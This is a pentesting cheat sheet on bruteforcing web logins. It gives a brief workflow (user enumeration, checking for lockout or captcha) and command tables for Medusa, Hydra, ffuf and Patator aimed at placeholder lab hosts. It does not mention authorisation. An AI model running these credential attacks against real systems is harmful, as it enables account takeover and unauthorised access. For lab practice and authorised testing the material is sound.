Bruteforcing
Bruteforcing is used to test credentials until we find valid ones.
Workflow
-
Identify login endpoints:
/login, /auth, /signin -
Analyze responses:
- Check if it returns different error messages depending on whether the user exists or not.
- Check response time differences depending on whether the user exists or not.
-
Inspect cookies, sessions, etc.
-
Verify if protections exist:
MFA, Captcha, Rate Limiting, Account Lockout. -
Check default credentials.
Medusa
| Command | Description |
|---|---|
medusa -h target.hmv -u admin -P passwords.txt -M http |
Basic GET bruteforce |
medusa -h target.hmv -U users.txt -P passwords.txt -M http |
Users + passwords |
medusa -h target.hmv -u admin -P passwords.txt -t 10 -M http |
Threads |
medusa -h target.hmv -u admin -P passwords.txt -M https |
HTTPS |
medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php?user=^USER^&pass=^PASS^:F=Invalid" |
Basic GET in URL |
medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php:username=^USER^&password=^PASS^:F=Invalid" |
Basic POST bruteforce |
medusa -h target.hmv -U users.txt -P passwords.txt -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:F=Login failed" |
Basic POST bruteforce with multiple users |
medusa -h target.hmv -u admin -P passwords.txt -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:S=Welcome" |
Detect success by string |
medusa -h target.hmv -u admin -P passwords.txt -t 10 -M http -m FORM:"/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
Detect failure + threads |
medusa -h target.com -u admin -P passwords.txt -M http -m FORM:"/api/login:{\"user\":\"^USER^\",\"pass\":\"^PASS^\"}:F=error" |
Basic JSON |
Hydra
| Command | Description |
|---|---|
hydra -l admin -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
POST bruteforce |
hydra -L users.txt -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
Users + passwords bruteforce |
hydra -l admin -P passwords.txt target.hmv http-get-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
GET bruteforce |
hydra -l admin -P passwords.txt target.hmv https-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
HTTPS bruteforce |
hydra -l admin -P passwords.txt target.hmv http-post-form "/login.php:user=^USER^&pass=^PASS^:S=Welcome" |
Detect "Welcome" as success |
hydra -l admin -P passwords.txt -t 16 -V target.com http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid" |
Verbose + threads |
hydra -l admin -P passwords.txt target.hmv http-post-json "/api/login:{\"user\":\"^USER^\",\"pass\":\"^PASS^\"}:F=error" |
JSON API bruteforce |
hydra -L usernames.txt -P passwords.txt www.target.hmv http-get |
Basic GET auth |
hydra -l admin -P passwords.txt target.hmv http-get / -s 1337 |
Basic auth on custom port |
hydra -l admin -P passwords.txt target.hmv http-post-form "/login:user=^USER^&pass=^PASS^:S=302" |
Web Login Form |
Ffuf
| Command | Description |
|---|---|
ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fr "Invalid" |
Password bruteforce |
ffuf -u http://target.hmv/login -X POST -d "user=FUZZ&pass=1234" -w users.txt -fr "Invalid" |
Username bruteforce |
ffuf -u http://target.hmv/login -X POST -d "user=FUZZ&pass=FUZ2Z" -w users.txt:FUZZ -w passwords.txt:FUZ2Z |
User/password bruteforce |
ffuf -u http://target.hmv/api/login -X POST -H "Content-Type: application/json" -d '{"user":"admin","pass":"FUZZ"}' -w passwords.txt -fr "error" |
JSON API bruteforce |
ffuf -u http://target.hmv/login?user=admin&pass=FUZZ -w passwords.txt -fr "Invalid" |
GET bruteforce |
ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -mc 200 |
Filter by HTTP code |
ffuf -u http://target.hmv/login -X POST -d "user=admin&pass=FUZZ" -w passwords.txt -fs 1234 |
Filter by response size |
Patator
| Command | Description |
|---|---|
patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -x ignore:fgrep='Invalid' |
Basic POST |
patator http_fuzz url=http://target.hmv/login method=POST body='user=FILE0&pass=FILE1' 0=users.txt 1=passwords.txt |
User + password |
patator http_fuzz url=http://target.hmv/login method=GET url='http://target.com/login?user=admin&pass=FILE0' 0=passwords.txt |
GET |
patator http_fuzz url=http://target.hmv/api/login method=POST header='Content-Type: application/json' body='{"user":"admin","pass":"FILE0"}' 0=passwords.txt |
JSON |
patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -x ignore:code=401 |
Filter by HTTP code |
patator http_fuzz url=http://target.hmv/login method=POST body='user=admin&pass=FILE0' 0=passwords.txt -t 10 |
Use 10 threads |